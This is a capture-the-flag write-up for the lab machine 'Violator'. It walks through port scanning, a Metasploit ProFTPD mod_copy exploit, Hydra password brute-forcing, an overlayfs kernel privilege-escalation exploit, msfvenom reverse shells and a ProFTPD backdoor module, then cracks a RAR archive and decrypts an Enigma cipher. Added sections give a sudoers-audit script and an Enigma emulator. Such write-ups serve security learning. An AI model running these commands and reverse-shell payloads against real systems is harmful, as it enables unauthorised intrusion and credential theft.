Write-up-Violator
Original page read on: 2023-07-08, views: 5
  • Download: click me

  • Flag: /root/flag.txt

  • Bilibili: video

  • Network interface: VMware vmnet8

    ➜ ~ ip addr show dev vmnet8
    5: vmnet8: mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
    inet 172.16.249.1/24 brd 172.16.249.255 scope global vmnet8
    valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fec0:8/64 scope link
    valid_lft forever preferred_lft forever

    ➜ ~ nmap -T4 -A 172.16.249.1/24
    Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-06 08:09 CST
    Nmap scan report for 172.16.249.1
    Host is up (0.00013s latency).
    Not shown: 999 closed ports
    PORT STATE SERVICE VERSION
    902/tcp open ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)

    Nmap scan report for 172.16.249.129
    Host is up (0.00035s latency).
    Not shown: 998 closed ports
    PORT STATE SERVICE VERSION
    21/tcp open ftp ProFTPD 1.3.5rc3
    80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
    |_http-server-header: Apache/2.4.7 (Ubuntu)
    |_http-title: I Say… I say… I say Boy! You pumpin' for oil or somethin'…?
    Service Info: OS: Unix

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 256 IP addresses (2 hosts up) scanned in 72.25 seconds

  1. IP: 172.16.249.129, Ubuntu, ports 21 and 80 open. The home page holds one image and one link to a wiki page, which may be the way in.

    ➜ ~ curl -L http://172.16.249.129/
    I Say… I say… I say Boy! You pumpin' for oil or somethin'…?
    I Say.. I say… I say boy! You're barkin up the wrong tree!
    foggie.jpg <-- https://en.wikipedia.org/wiki/Violator_(album) -->

  • Not a WordPress site, but I ran nikto anyway: nothing found. The EXIF data of foggie.jpg showed nothing either.

    ➜ ~ nikto -h http://172.16.249.129/

    - Nikto v2.1.6

    + Target IP: 172.16.249.129
    + Target Hostname: 172.16.249.129
    + Target Port: 80

    + Start Time: 2018-08-06 08:16:20 (GMT8)

    + Server: Apache/2.4.7 (Ubuntu)
    + Server leaks inodes via ETags, header found with file /, fields: 0x13e 0x53518115c6709
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
    + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
    + OSVDB-3233: /icons/README: Apache default file found.
    + 7535 requests: 0 error(s) and 7 item(s) reported on remote host

    + End Time: 2018-08-06 08:16:28 (GMT8) (8 seconds)

    + 1 host(s) tested
  1. So attention turns to FTP. nmap reported ProFTPD 1.3.5rc3; check whether that version has known vulnerabilities.

    ➜ ~ searchsploit ProFTPD 1.3.5
    ------------------------------------------------------------ ----------------------------------------
     Exploit Title                                              |  Path
                                                                | (/home/kali-team/Kali-Team/exploit-database/)
    ------------------------------------------------------------ ----------------------------------------
    ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)   | exploits/linux/remote/37262.rb
    ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution         | exploits/linux/remote/36803.py
    ProFTPd 1.3.5 - File Copy                                   | exploits/linux/remote/36742.txt
    ------------------------------------------------------------ ----------------------------------------

  • All three can be used; the first one, the Metasploit module, is the most convenient.

    msf > use exploit/unix/ftp/proftpd_modcopy_exec
    msf exploit(unix/ftp/proftpd_modcopy_exec) > show options

    Module options (exploit/unix/ftp/proftpd_modcopy_exec):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    Proxies no A proxy chain of format type:host:port[,type:host:port][…]
    RHOST yes The target address
    RPORT 80 yes HTTP port (TCP)
    RPORT_FTP 21 yes FTP port
    SITEPATH /var/www yes Absolute writable website path
    SSL false no Negotiate SSL/TLS for outgoing connections
    TARGETURI / yes Base path to the website
    TMPPATH /tmp yes Absolute writable path
    VHOST no HTTP server virtual host

    Exploit target:

    Id Name
    -- ----
    0 ProFTPD 1.3.5

    msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhost 172.16.249.129
    rhost => 172.16.249.129
    msf exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html
    sitepath => /var/www/html
    msf exploit(unix/ftp/proftpd_modcopy_exec) > run

    [*] Started reverse TCP handler on 172.16.249.1:4444
    [*] 172.16.249.129:80 - 172.16.249.129:21 - Connected to FTP server
    [*] 172.16.249.129:80 - 172.16.249.129:21 - Sending copy commands to FTP server
    [*] 172.16.249.129:80 - Executing PHP payload /O8hgrL.php
    [*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.129:33406) at 2018-08-06 14:10:35 +0800

    ls
    O8hgrL.php
    foggie.jpg
    i0KEqK.php
    index.html

  • The system is Ubuntu, so the path is set to /var/www/html. The two PHP files in that directory are the backdoors Metasploit generated.

    whoami
    www-data
    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    libuuid:x:100:101::/var/lib/libuuid:
    syslog:x:101:104::/home/syslog:/bin/false
    messagebus:x:102:106::/var/run/dbus:/bin/false
    landscape:x:103:109::/var/lib/landscape:/bin/false
    dg:x:1000:1000:Dave Gahan,,,:/home/dg:/bin/bash
    proftpd:x:104:65534::/var/run/proftpd:/bin/false
    ftp:x:105:65534::/srv/ftp:/bin/false
    mg:x:1001:1001:Martin Gore:/home/mg:/bin/bash
    af:x:1002:1002:Andrew Fletcher:/home/af:/bin/bash
    aw:x:1003:1003:Alan Wilder:/home/aw:/bin/bash
    uname -a
    Linux violator 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

  • Found several usernames: dg, mg, af, aw. Uploaded to the server and tried it: the privilege-escalation vulnerability is there, but www-data cannot use sudo.

    www-data@violator:/var/www/html$ cat /etc/group
    cat /etc/group
    root:x:0:
    daemon:x:1:
    bin:x:2:
    sys:x:3:
    adm:x:4:syslog,dg
    tty:x:5:
    disk:x:6:
    lp:x:7:
    mail:x:8:
    news:x:9:
    uucp:x:10:
    man:x:12:
    proxy:x:13:
    kmem:x:15:
    dialout:x:20:
    fax:x:21:
    voice:x:22:
    cdrom:x:24:dg
    floppy:x:25:
    tape:x:26:
    sudo:x:27:dg
    audio:x:29:
    dip:x:30:dg
    www-data:x:33:
    backup:x:34:
    operator:x:37:
    list:x:38:
    irc:x:39:
    src:x:40:
    gnats:x:41:
    shadow:x:42:
    utmp:x:43:
    video:x:44:
    sasl:x:45:
    plugdev:x:46:dg
    staff:x:50:
    games:x:60:
    users:x:100:mg,af,aw
    nogroup:x:65534:
    libuuid:x:101:
    netdev:x:102:
    crontab:x:103:
    syslog:x:104:
    fuse:x:105:
    messagebus:x:106:
    mlocate:x:107:
    ssh:x:108:
    landscape:x:109:
    dg:x:1000:
    lpadmin:x:110:dg
    sambashare:x:111:dg
    ssl-cert:x:112:
    mg:x:1001:
    af:x:1002:
    aw:x:1003:

  • dg is the only user who can sudo. Go through each user's home directory; this is what turned up.

    www-data@violator:/home/af$ ls
    ls
    minarke-1.21 minarke-1.21.tar.bz2
    www-data@violator:/home/aw$ file hint
    file hint
    hint: ASCII text
    www-data@violator:/home/aw$ cat hint
    cat hint
    You are getting close… Can you crack the final enigma..?
    www-data@violator:/home/aw$
    www-data@violator:/home$ ls dg
    ls dg
    bd
    www-data@violator:/home/mg$ file faith_and_devotion
    file faith_and_devotion
    faith_and_devotion: ASCII text
    www-data@violator:/home/mg$ cat faith_and_devotion
    cat faith_and_devotion
    Lyrics:

    • Use Wermacht with 3 rotors
    • Reflector to B
      Initial: A B C
      Alphabet Ring: C B A
      Plug Board A-B, C-D

    www-data@violator:/home/mg$

  • Copied everything to /var/www/html and downloaded it locally. Then I was stuck: foreign material I could not make sense of. So I went back to the wiki page found earlier and thought of using CeWL to crawl its words as a dictionary to brute-force those four users. CeWL's own description follows. What I actually used as the password list was the album and song titles with the spaces removed.

CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

    ➜  CeWL git:(master) ✗ ./cewl.rb -v 'https://en.wikipedia.org/wiki/Violator_(album)' -d 1 -w pass.txt
    ➜  CeWL git:(master) ✗ cat pass.txt |wc -l
    10429
    ➜  CeWL git:(master) ✗ hydra -L user.txt -P pass.txt -u 172.16.249.129 ftp
    Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-07 18:56:59
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 92 login tries (l:4/p:23), ~6 tries per task
    [DATA] attacking ftp://172.16.249.129:21/
    [21][ftp] host: 172.16.249.129   login: aw   password: sweetestperfection
    [21][ftp] host: 172.16.249.129   login: af   password: enjoythesilence
    [21][ftp] host: 172.16.249.129   login: mg   password: bluedress
    [21][ftp] host: 172.16.249.129   login: dg   password: policyoftruth
    ^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
    ➜  CeWL git:(master) ✗
  1. The first method: use the exploit directly. The shell obtained through msf has no upload function, and a one-line PHP webshell did not seem to work either, so I base64-encoded exp.c, wrote it into the shell, decoded it back to exp.c on the server, then compiled and ran it.

    ➜ ~ searchsploit -p 39166
    Exploit: Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1)
    URL: https://www.exploit-db.com/exploits/39166/
    Path: /home/kali-team/Kali-Team/exploit-database/exploits/linux/local/39166.c
    File Type: C source, ASCII text, with CRLF line terminators

    ➜ ~ cp /home/kali-team/Kali-Team/exploit-database/exploits/linux/local/39166.c exp.c
    ➜ ~ cat exp.c|base64
    ➜ ~

  • Decode the base64 on the server side

    dg@violator:/var/www/html$ cat exp.txt|base64 -d >exp.c
    cat exp.txt|base64 -d >exp.c

    dg@violator:/var/www/html$ gcc exp.c
    gcc exp.c
    dg@violator:/var/www/html$ ls
    ls
    a.out exp.c exp.txt J0dov8.php jc7gX.php vMZTOjJ.php
    dg@violator:/var/www/html$ ./a.out
    ./a.out
    root@violator:/var/www/html# id
    id
    uid=0(root) gid=1000(dg) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(dg)
    root@violator:/var/www/html#

  1. Second privilege-escalation method: log in to FTP as dg with password policyoftruth, change to /var/www/html and upload a Meterpreter shell.
  • Generate the meterpreter shell; uploading over FTP is just a PUT.

    ➜ ~ msfvenom -p php/meterpreter_reverse_tcp LPORT=7788 LHOST=172.16.249.1 -f raw -o msf.php
    msf > use exploit/multi/handler
    msf exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
    payload => php/meterpreter_reverse_tcp
    msf exploit(multi/handler) > set lport 7788
    lport => 7788
    msf exploit(multi/handler) > set lhost 172.16.249.1
    lhost => 172.16.249.1
    msf exploit(multi/handler) > run

    [*] Started reverse TCP handler on 172.16.249.1:7788
    [*] Meterpreter session 1 opened (172.16.249.1:7788 -> 172.16.249.129:35623) at 2018-08-07 20:36:38 +0800

  • This one has far more functionality; it is the payload I normally use.

    www-data@violator:/var/www/html$ su dg
    su dg
    Password: policyoftruth

    dg@violator:/var/www/html$ sudo -l
    sudo -l
    Matching Defaults entries for dg on violator:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

    User dg may run the following commands on violator:
    (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
    dg@violator:/var/www/html$

  • Above you can see that the proftpd daemon runs as root, that this binary happens to be vulnerable, and that running it requires no root password. Change to /home/dg/bd/sbin/, start proftpd as root, and then exploit the vulnerability.
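The rule that makes this escalation possible is exactly what a sudoers audit should catch. The checker below is added for this page and is not part of the write-up: it parses `sudo -l` output (the output shown above, embedded as a constructed sample) and reports NOPASSWD rules, `ALL` commands, and commands that live in a home directory or outside secure_path.

```python
import re

# Constructed sample: the `sudo -l` output the write-up shows for user dg on violator.
SAMPLE = """\
Matching Defaults entries for dg on violator:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User dg may run the following commands on violator:
    (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
"""

# One "(runas) TAG: cmd, cmd" line of the "may run the following commands" section
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_secure_path(text):
    """Return the secure_path directories; sudo prints the colons escaped as backslash-colon."""
    m = re.search(r"secure_path=(\S+)", text)
    return m.group(1).replace("\\:", ":").split(":") if m else []


def parse_rules(text):
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
            for cmd in m.group("cmds").split(","):
                rules.append({"runas": m.group("runas"), "tags": tags, "cmd": cmd.strip()})
    return rules


def assess(text):
    """List (command, reasons) for rules that deserve a second look."""
    secure_dirs = [d.rstrip("/") + "/" for d in parse_secure_path(text)]
    findings = []
    for r in parse_rules(text):
        path = r["cmd"].split()[0]
        reasons = []
        if "NOPASSWD" in r["tags"]:
            reasons.append("no password required")
        if r["cmd"] == "ALL":
            reasons.append("any command")
        elif path.startswith("/home/"):
            reasons.append("binary lives in a home directory")
        elif secure_dirs and not any(path.startswith(d) for d in secure_dirs):
            reasons.append("binary outside secure_path")
        if reasons:
            findings.append((r["cmd"], reasons))
    return findings


if __name__ == "__main__":
    for cmd, reasons in assess(SAMPLE):
        print(f"{cmd}: {'; '.join(reasons)}")
```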

    dg@violator:/var/www/html$ cd /home/dg/bd/sbin/
    cd /home/dg/bd/sbin/
    dg@violator:~/bd/sbin$ ls
    ls
    ftpscrub ftpshut in.proftpd proftpd
    dg@violator:~/bd/sbin$ ls -al
    ls -al
    total 564
    drwxr-xr-x 2 root root 4096 Jun 6 2016 .
    drwxr-xr-x 10 root root 4096 Jun 6 2016 ..
    -rwxr-xr-x 1 root root 15976 Jun 6 2016 ftpscrub
    -rwxr-xr-x 1 root root 10456 Jun 6 2016 ftpshut
    lrwxrwxrwx 1 root root 7 Jun 6 2016 in.proftpd -> proftpd
    -rwxr-xr-x 1 root root 537488 Jun 6 2016 proftpd
    dg@violator:~/bd/sbin$ sudo ./proftpd
    sudo ./proftpd

    - setting default address to 127.0.0.1
    localhost - SocketBindTight in effect, ignoring DefaultServer
    dg@violator:~/bd/sbin$
    dg@violator:~/bd/sbin$ netstat -antp
    netstat -antp
    (Not all processes could be identified, non-owned process info
    will not be shown, you would have to be root to see it all.)
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
    tcp 0 0 127.0.0.1:2121 0.0.0.0:* LISTEN -
    tcp 0 0 172.16.249.129:60704 172.16.249.1:4444 CLOSE_WAIT -
    tcp 0 0 172.16.249.129:60705 172.16.249.1:4444 CLOSE_WAIT -
    tcp 0 0 172.16.249.129:35623 172.16.249.1:7788 ESTABLISHED 2669/bash
    tcp6 0 0 :::21 :::* LISTEN -
    tcp6 0 0 :::80 :::* LISTEN -
    tcp6 0 0 172.16.249.129:80 172.16.249.1:51132 ESTABLISHED -
    dg@violator:~/bd/sbin$
  • The daemon is now running and listening on port 2121, but only on 127.0.0.1, so port forwarding is needed.

    meterpreter > portfwd add -L 127.0.0.1 -l 2121 -p 2121 -r 127.0.0.1
    [*] Local TCP relay created: 127.0.0.1:2121 <-> 127.0.0.1:2121

    meterpreter > background
    [*] Backgrounding session 1…
    msf exploit(multi/handler) > use exploit/unix/ftp/proftpd_133c_backdoor
    msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/
    set payload cmd/unix/bind_perl
    set payload cmd/unix/bind_perl_ipv6
    set payload cmd/unix/generic
    set payload cmd/unix/reverse
    set payload cmd/unix/reverse_bash_telnet_ssl
    set payload cmd/unix/reverse_perl
    set payload cmd/unix/reverse_perl_ssl
    set payload cmd/unix/reverse_ssl_double_telnet
    msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
    payload => cmd/unix/reverse_perl
    msf exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 172.16.249.1
    lhost => 172.16.249.1
    msf exploit(unix/ftp/proftpd_133c_backdoor) > show options

    Module options (exploit/unix/ftp/proftpd_133c_backdoor):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST yes The target address
    RPORT 21 yes The target port (TCP)

    Payload options (cmd/unix/reverse_perl):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    LHOST 172.16.249.1 yes The listen address (an interface may be specified)
    LPORT 4444 yes The listen port

    Exploit target:

    Id Name
    -- ----
    0 Automatic

    msf exploit(unix/ftp/proftpd_133c_backdoor) > run

    [-] Exploit failed: The following options failed to validate: RHOST.
    [*] Exploit completed, but no session was created.
    msf exploit(unix/ftp/proftpd_133c_backdoor) > set rport 2121
    rport => 2121
    msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 127.0.0.1
    rhost => 127.0.0.1
    msf exploit(unix/ftp/proftpd_133c_backdoor) > run

    [*] Started reverse TCP handler on 172.16.249.1:4444
    [*] 127.0.0.1:2121 - Sending Backdoor Command
    [*] Command shell session 2 opened (172.16.249.1:4444 -> 172.16.249.129:60709) at 2018-08-07 21:05:32 +0800

    id
    uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

  • Root obtained; now go and grab the flag.

    python -c 'import pty;pty.spawn("/bin/bash")'
    root@violator:/# ls
    ls
    bin dev home lib lost+found mnt proc run srv tmp var
    boot etc initrd.img lib64 media opt root sbin sys usr vmlinuz
    root@violator:/# cd /root
    cd /root
    root@violator:/root# ls
    ls
    flag.txt
    root@violator:/root# cat flag.txt
    cat flag.txt
    I say… I say… I say boy! Pumping for oil or something…?
    ---Foghorn Leghorn "A Broken Leghorn" 1950 (C) W.B.
    root@violator:/root#

  • There is a hidden directory under /root. Downloaded it to have a look and found it is password-protected.

    root@violator:/root# ll
    ll
    total 24
    drwx------ 3 root root 4096 Jun 14 2016 ./
    drwxr-xr-x 22 root root 4096 Jun 14 2016 ../
    -rw-r--r-- 1 root root 3106 Feb 20 2014 .bashrc
    d--x------ 2 root root 4096 Jun 14 2016 .basildon/
    -rw-r--r-- 1 root root 114 Jun 12 2016 flag.txt
    -rw-r--r-- 1 root root 140 Feb 20 2014 .profile
    root@violator:/root# cd .basildon/
    cd .basildon/
    root@violator:/root/.basildon# ls
    ls
    crocs.rar
    root@violator:/root/.basildon#

    ➜ DOWNLOAD john hash --wordlist=/home/kali-team/Kali-Team/password-recovery/CeWL/pass
    Warning: detected hash type "rar", but the string is also recognized as "rar-opencl"
    Use the "--format=rar-opencl" option to force loading these as that type instead
    Loaded 1 password hash (rar, RAR3 [SHA1 AES 32/64])
    Will run 4 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    World in My Eyes (crocs.rar)
    1g 0:00:00:00 DONE (2018-08-07 21:20) 3.703g/s 88.88p/s 88.88c/s 88.88C/s enjoythesilence..World in My Eyes
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed

  • The cracked password is World in My Eyes. Don't ask how I knew; the plot required it. Now on to the steganography.

    ➜ DOWNLOAD exiftool artwork.jpg
    ExifTool Version Number : 11.01
    File Name : artwork.jpg
    Directory : .
    File Size : 183 kB
    File Modification Date/Time : 2016:06:12 14:38:12+08:00
    File Access Date/Time : 2018:08:07 21:23:12+08:00
    File Inode Change Date/Time : 2018:08:07 21:23:12+08:00
    File Permissions : rw-r--r--
    File Type : JPEG
    File Type Extension : jpg
    MIME Type : image/jpeg
    JFIF Version : 1.01
    Resolution Unit : inches
    X Resolution : 300
    Y Resolution : 300
    Exif Byte Order : Big-endian (Motorola, MM)
    Image Description : Violator
    Software : Google
    Artist : Dave Gaham
    Copyright : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
    Exif Version : 0220
    Date/Time Original : 1990:03:19 22:13:30
    Create Date : 1990:03:19 22:13:30
    Sub Sec Time Original : 04
    Sub Sec Time Digitized : 04
    Exif Image Width : 1450
    Exif Image Height : 1450
    XP Title : Violator
    XP Author : Dave Gaham
    XP Keywords : created by user dg
    XP Subject : policyoftruth
    Padding : (Binary data 1590 bytes, use -b option to extract)
    About : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b
    Rights : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
    Creator : Dave Gaham
    Subject : created by user dg
    Title : Violator
    Description : Violator
    Warning : [minor] Fixed incorrect URI for xmlns:MicrosoftPhoto
    Date Acquired : 1941:05:09 10:30:18.134
    Last Keyword XMP : created by user dg
    Image Width : 1450
    Image Height : 1450
    Encoding Process : Baseline DCT, Huffman coding
    Bits Per Sample : 8
    Color Components : 3
    Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
    Image Size : 1450x1450
    Megapixels : 2.1
    Create Date : 1990:03:19 22:13:30.04
    Date/Time Original : 1990:03:19 22:13:30.04
    ➜ DOWNLOAD

  • The two copyright fields clearly stand out, but the value is not base64. Then there are the lyrics found in mg's directory and a C program, neither of which has been used so far.

Lyrics:

  • Use Wermacht with 3 rotors
  • Reflector to B
    Initial: A B C
    Alphabet Ring: C B A
    Plug Board A-B, C-D

  • It seems that C program is meant to decrypt the string, but it hangs.

    ➜ minarke-1.21 ./minarke

    Minarke, an Enigma M4 emulator
    by John Gilbert

    Emulates the Kriegsmarine M4 Enigma encryption machine

    Initial Setup Notes

    Rotors: Reflector (B/C), Thin Rotor (B/G), 3 Rotors (1-8, can't reuse them)
    Use BB### or CG### with A### settings to read/create Wehrmacht three rotor traffic
    Ring and position settings: A-Z for each of the 4 rotors
    Reflector setting is always fixed at A.
    Plugboard settings: A-Z,A-Z pairs, also won't allow reuse
    Hit return to end input, 11 pairs recomended for maximum security.
    Hit ESC at any time to quit.

    Special Keys (during input mode)

    1: rewind one setting
    2: reset position settings
    3: new position settings
    4: new setup
    9: toggle debug
    0: show position settings
    ?: show help

    see http://en.wikipedia.org/wiki/Enigma_machine
    also http://www.bytereef.org/m4_project.html

    Rotors:

  • I Googled an online decryption tool; the decryption came out but is hard to read, and with no spaces I could not translate it. The flag was obtained anyway.

    ONEFINALCHALLENGEFORYOUBGHXCONGRATULATIONSFORTHEFOURTHTIMEONSNARFINGTHEFLAGONVIOLATORILLPRESUMEBYNOWYOULLKNOWWHATIWASLISTENINGTOWHENCREATINGTHISCTFIHAVEINCLUDEDTHINGSWHICHWEREDELIBERATLYAVOIDINGTHEOBVIOUSROUTEINTOKEEPYOUONYOURTOESANOTHERTHOUGHTTOPONDERISTHATBYABUSINGPERMISSIONSYOUAREALSOBYDEFINITIONAVIOLATORSHOUTOUTSAGAINTOVULNHUBFORHOSTINGAGREATLEARNINGTOOLASPECIALTHANKSGOESTOBENRANDGKNSBFORTESTINGANDTOGTMLKFORTHEOFFERTOHOSTTHECTFAGAINKNIGHTMARE
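To make the hint concrete, here is a Wehrmacht three-rotor Enigma emulator in Python, added to this write-up (it is neither minarke nor the author's code). It implements the reflector, ring settings, start positions, plugboard and double stepping that the hint and minarke's help text refer to; the hint does not say which rotor goes in which slot, so the rotor order is an assumption and the script prints the result for all six orderings of rotors I, II and III so the readable one can be picked.

```python
from itertools import permutations

ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
# Historical Wehrmacht rotor wirings with their turnover notch letters.
ROTORS = {
    "I":   ("EKMFLGDQVZNTOWYHXUSPAIBRCJ", "Q"),
    "II":  ("AJDKSIRUXBLHWTMCQGZNPYFVOE", "E"),
    "III": ("BDFHJLCPRTXVZNYEIWGAKMUSQO", "V"),
}
REFLECTORS = {"B": "YRUHQSLDPXNGOKMIEBFZCWVJAT", "C": "FVPJIAOYEDRZXWGCTKUQSBNMHL"}

class Rotor:
    def __init__(self, name, ring, position):
        wiring, notch = ROTORS[name]
        self.fwd = [ALPHA.index(c) for c in wiring]
        self.inv = [self.fwd.index(i) for i in range(26)]
        self.notch = ALPHA.index(notch)
        self.ring = ALPHA.index(ring)     # Ringstellung, the hint's "Alphabet Ring"
        self.pos = ALPHA.index(position)  # Grundstellung, the hint's "Initial"

    def step(self):
        self.pos = (self.pos + 1) % 26

    def forward(self, c):   # right-to-left pass, before the reflector
        off = (self.pos - self.ring) % 26
        return (self.fwd[(c + off) % 26] - off) % 26

    def backward(self, c):  # left-to-right pass, after the reflector
        off = (self.pos - self.ring) % 26
        return (self.inv[(c + off) % 26] - off) % 26

class Enigma:
    def __init__(self, rotor_names, reflector, rings, positions, plugboard=""):
        # rotor_names, rings and positions are listed left to right, as on the machine
        self.rotors = [Rotor(n, r, p) for n, r, p in zip(rotor_names, rings, positions)]
        self.reflector = [ALPHA.index(c) for c in REFLECTORS[reflector]]
        self.plug = list(range(26))
        for pair in plugboard.replace(",", " ").split():
            a, b = (ALPHA.index(ch) for ch in pair.replace("-", ""))
            self.plug[a], self.plug[b] = b, a

    def window(self):
        return "".join(ALPHA[r.pos] for r in self.rotors)

    def _step(self):
        left, mid, right = self.rotors
        # Double stepping: a middle rotor on its notch moves itself and the left rotor
        if mid.pos == mid.notch:
            mid.step()
            left.step()
        elif right.pos == right.notch:
            mid.step()
        right.step()

    def press(self, ch):
        self._step()  # the rotors move before the current flows
        c = self.plug[ALPHA.index(ch)]
        for r in reversed(self.rotors):
            c = r.forward(c)
        c = self.reflector[c]
        for r in self.rotors:
            c = r.backward(c)
        return ALPHA[self.plug[c]]

    def run(self, text):
        # Enigma is self-reciprocal: the same settings both encrypt and decrypt
        return "".join(self.press(ch) for ch in text.upper() if ch in ALPHA)

# Settings from the faith_and_devotion hint; it does not say which rotor goes in which slot.
HINT = dict(reflector="B", rings="CBA", positions="ABC", plugboard="A-B, C-D")

def decrypt_with(order, ciphertext):
    return Enigma(order, **HINT).run(ciphertext)

if __name__ == "__main__":
    ct = input("Ciphertext (the Copyright field from exiftool): ")
    for order in permutations(ROTORS):  # rotor order is the assumption, so try all six
        print("-".join(order), decrypt_with(order, ct)[:60])
```

Paste the Copyright string from the exiftool output when prompted; the ordering whose first 60 letters read as English is the one to use for the full text.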
